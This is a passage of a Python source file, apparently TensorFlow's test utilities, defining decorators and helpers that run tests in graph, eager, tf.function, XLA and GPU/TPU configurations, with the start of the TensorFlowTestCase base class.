"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def enable_eager_op_as_function(fn):
"""Decorator for enabling eager_op_as_function on a test.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will enable run_eager_op_as_function,
reset the context, execute the test, then reset the context to the state
it was in prior to this test.
Example:
class MyTest(test.TestCase):
@enable_eager_op_as_function
def testFoo(self):
...
Args:
fn: the function to be wrapped.
Returns:
The wrapped function.
"""
def wrapper(*args, **kwargs):
# If `run_eager_op_as_function` is already enabled do nothing.
if context.run_eager_op_as_function_enabled():
return fn(*args, **kwargs)
context.enable_run_eager_op_as_function()
try:
return fn(*args, **kwargs)
finally:
context.disable_run_eager_op_as_function()
return wrapper
def with_eager_op_as_function(cls=None, only_as_function=False):
"""Adds methods that call original methods with eager_op_as_function enabled.
Example:
@test_util.with_eager_op_as_function
class SessionTest(test.TestCase):
def testEnabledForEagerOpAsFunction(self):
...
@disable_eager_op_as_function("b/xyzabc")
def testDisabledForEagerOpAsFunction(self):
...
Generated class:
class SessionTest(test.TestCase):
def testEnabledForEagerOpAsFunction(self):
...
def testEnabledForEagerOpAsFunctionWithEagerOpAsFunctionEnabled(self):
// Enable run_eager_op_as_function
// Reset context
testEnabledForEagerOpAsFunction(self)
// Disable run_eager_op_as_function
// Reset context
def testDisabledForEagerOpAsFunction(self):
...
Args:
cls: class to decorate.
only_as_function: whether to run all the tests in the TestCase in eager mode
and in eager_op_as_function mode. By default it will run all tests in both
modes. When `only_as_function=True` tests will not be run in eager mode.
Returns:
cls with new test methods added.
"""
def decorator(cls):
if context.run_eager_op_as_function_enabled():
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
(name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("benchmark")) and
not getattr(value, "_disable_eager_op_as_function", False)):
setattr(cls, name + "WithEagerOpAsFunctionEnabled",
enable_eager_op_as_function(value))
if only_as_function:
delattr(cls, name)
return cls
if cls is not None:
return decorator(cls)
return decorator
def disable_eager_op_as_function(unused_msg):
"""Decorator for a function in a with_eager_op_as_function enabled test class.
Blocks the function from being run with eager_op_as_function enabled.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_eager_op_as_function attr set to True.
"""
def wrapper(func):
func._disable_eager_op_as_function = True
return func
# Once the environment flag is flipped and `run_eager_op_as_function_enabled`
# is True by default, the `with_eager_op_as_function` wrapper will not add a
# separate test for eager_op_as_function execution. In that case the test with
# the original name needs to be disabled.
if context.run_eager_op_as_function_enabled():
return _disable_test(execute_func=False)
return wrapper
def set_xla_env_flag(func=None, flag=""):
"""Decorator for setting XLA_FLAGS prior to running a test.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will allow users to set any xla flags
exposed via the XLA_FLAGS environment variable, execute the test, then reset
the XLA_FLAGS to the state it was in prior to this test.
Example:
class MyTest(test.TestCase):
@set_xla_env_flag(flag='--xla_gpu_enable_fast_min_max=false')
def testFoo(self):
...
Args:
func: The function to be wrapped.
flag: The xla flag to be set in the XLA_FLAGS env variable.
Returns:
The wrapped function.
"""
def decorator(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = flag
if original_xla_flags:
new_xla_flags = new_xla_flags + " " + original_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
try:
return f(*args, **kwargs)
finally:
if original_xla_flags is None:
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return decorated
if func is not None:
return decorator(func)
return decorator
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
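# Illustrative usage sketch (hypothetical test class, shown as a comment only):
# because the decorator is built on `parameterized.named_parameters`, the test
# class must inherit from `parameterized.TestCase`, and two variants of the
# test are generated (one async, one sync).
#
#   class MyTest(test.TestCase, parameterized.TestCase):
#
#     @test_util.run_in_async_and_sync_mode
#     def testEnqueue(self):
#       ...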
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
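# Illustrative usage sketch (hypothetical test method, shown as a comment
# only): the same body is executed once eagerly and once traced into a
# tf.function; note the restriction on variable creation described above.
#
#   @test_util.also_run_as_tf_function
#   def testAddConsistency(self):
#     ...  # body uses ops and TestCase assertions, but creates no variables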
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_or_tpu(func=None):
"""Execute the decorated test only if a physical GPU or TPU is available.
This function is intended to be applied to tests that require the presence
of a physical GPU or TPU. It complies with the following rules:
- If a GPU is available, the test will run on the GPU.
- If a GPU is absent and a TPU is available, the test will run on the TPU.
- If both GPU and TPU are absent, the test will be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_or_tpu` only supports test methods.")
def decorated(self, *args, **kwargs):
if config.list_physical_devices("GPU"):
return f(self, "GPU", *args, **kwargs)
if config.list_physical_devices("TPU"):
return f(self, "TPU", *args, **kwargs)
self.skipTest("Test requires GPU or TPU")
return decorated
return decorator if func is None else decorator(func)
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
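# Illustrative usage sketch (hypothetical test method, shown as a comment
# only): running the same test once with no forward-compatibility horizon and
# once with a horizon pinned far in the future.
#
#   @test_util.with_forward_compatibility_horizons(None, (2099, 1, 1))
#   def testNewKernelPath(self):
#     ...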
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function will
also return False. Use `tf.test.is_built_with_cuda` to check whether TensorFlow
was built with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading: this routine returns
True when a GPU device is available, irrespective of whether TF was built with
CUDA support or ROCm support. The name is nevertheless kept as is because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility.
++ Adding an equivalent "rocm_only" would require the implementation to check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility.
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
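# Illustrative sketch (hypothetical helper, never called here): how the device
# context managers above differ. `force_gpu()` fails at runtime when no GPU is
# present, whereas `device(use_gpu=True)` and `use_gpu()` silently fall back to
# the CPU.
def _example_device_helpers():
  with force_cpu():
    on_cpu = math_ops.add(1.0, 2.0)  # pinned to /device:CPU:0
  with device(use_gpu=True):
    maybe_on_gpu = math_ops.add(1.0, 2.0)  # GPU if available, else CPU
  return on_cpu, maybe_on_gpu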
@contextlib.contextmanager
def deterministic_ops():
"""Enables deterministic ops."""
try:
config.enable_op_determinism()
yield
finally:
config.disable_op_determinism()
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able to
call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable logging for OutOfRangeError, which would otherwise make the
# output of tf.data tests hard to read, because OutOfRangeError is used as
# the signal of completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return tf_decorator.make_decorator(func, decorated)
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_asan(description): # pylint: disable=unused-argument
"""Execute the test method only if ASAN is not enabled."""
execute_func = not is_asan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_msan(description): # pylint: disable=unused-argument
"""Execute the test method only if MSAN is not enabled."""
execute_func = not is_msan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tsan(description): # pylint: disable=unused-argument
"""Execute the test method only if TSAN is not enabled."""
execute_func = not is_tsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_ubsan(description): # pylint: disable=unused-argument
"""Execute the test method only if UBSAN is not enabled."""
execute_func = not is_ubsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
The given decorator is expected to take some arguments and return a callable
that is then applied to the test method to produce a decorated method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given class's test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
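# Illustrative usage sketch (hypothetical test class, shown as a comment only):
# lifting a per-method decorator factory, such as `disable_xla` defined below,
# to a whole test class. The description string is a placeholder.
#
#   @test_util.for_all_test_methods(test_util.disable_xla,
#                                   "this suite is not XLA-compatible")
#   class MyOpTest(test.TestCase):
#     ...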
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying that some other op or function works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64.
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
*args: Other positional arguments to tf.linalg.matmul.
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
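# Illustrative usage sketch (not part of the original module): use
# `matmul_without_tf32` when a matmul is only part of checking a result rather
# than the operation under test. `test_case` is a TensorFlowTestCase instance
# and `matrix_sqrt` is the (hypothetical) output of the op being verified.
def _example_matmul_without_tf32_usage(test_case, matrix_sqrt, expected_matrix):
  # Squaring the candidate square root should reproduce the original matrix.
  # The matmul itself is incidental here, so running it at full precision
  # (instead of TensorFloat-32) keeps the default tolerances meaningful.
  reconstructed = matmul_without_tf32(matrix_sqrt, matrix_sqrt)
  test_case.assertAllClose(reconstructed, expected_matrix)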
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
# Make sure we get unfiltered stack traces during the test
traceback_utils.disable_traceback_filtering()
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
